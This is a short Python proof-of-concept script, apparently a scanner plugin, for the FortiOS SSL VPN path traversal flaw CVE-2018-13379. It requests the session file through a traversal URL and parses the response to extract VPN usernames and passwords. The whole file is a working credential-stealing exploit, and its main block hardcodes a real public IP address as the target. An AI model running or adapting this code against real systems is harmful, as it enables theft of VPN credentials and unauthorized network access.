# coding:utf-8
import requests,re
requests.packages.urllib3.disable_warnings()

class c2Class(object):
	def __init__(self):
		self.vulname = 'Fortinet FortiOS路径遍历漏洞'
		self.vulsystem= 'FortiOS'
		self.vulversion = '5.6.3-5.6.7、6.0.0-6.0.4'
		self.cve = 'CVE-2018-13379'
		self.findtime='2019-05'
		self.refer= 'https://blog.csdn.net/limb0/article/details/102890683'
		self.testisok=True

		self.vulpath='/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'
		self.check_rc=re.compile('[^ ]+')
		self.flag=200
		self.flag2='fgt_lang'
		self.flag3=10
		self.check_rc2=re.compile(r'(?:[0-2]?[0-9]?[0-9]+\.){3}(?:[0-2]?[0-9]?[0-9])')

		self.recovered1=403
		self.recovered2=404

	def c2Func(self,target):
		status=0
		returnData=''
		if target.startswith(('https://')):
			pass
		else:
			target='https://'+target
		try:
			url=target.strip('/')+self.vulpath
			resp=requests.get(url=url,verify=False,timeout=2)
			_tmprespdata=self.check_rc.findall(resp.content.replace('\x00',' '))
			# print(_tmprespdata)
			# print(resp.status_code)
			if self.flag == resp.status_code and self.flag2 in _tmprespdata and self.flag3<len(_tmprespdata):
				userpwd={}
				for i in xrange(len(_tmprespdata)):
					_tempip=self.check_rc2.findall(_tmprespdata[i])
					if len(_tempip)>0:
						userpwd[_tmprespdata[i+1]]=_tmprespdata[i+2]
				returnData='%s is bad.The vuln is CVE-2018-13379.The payloa is [%s], '\
				'the ssl user:pass is [%s].'%(target.strip('/'),url,userpwd) #
				status=1
		except Exception as e:
			returnData=str(e)
		return status,returnData

if __name__ == '__main__':
	target='https://180.150.129.244/'
	pocObj=c2Class()
	print(pocObj.c2Func(target))
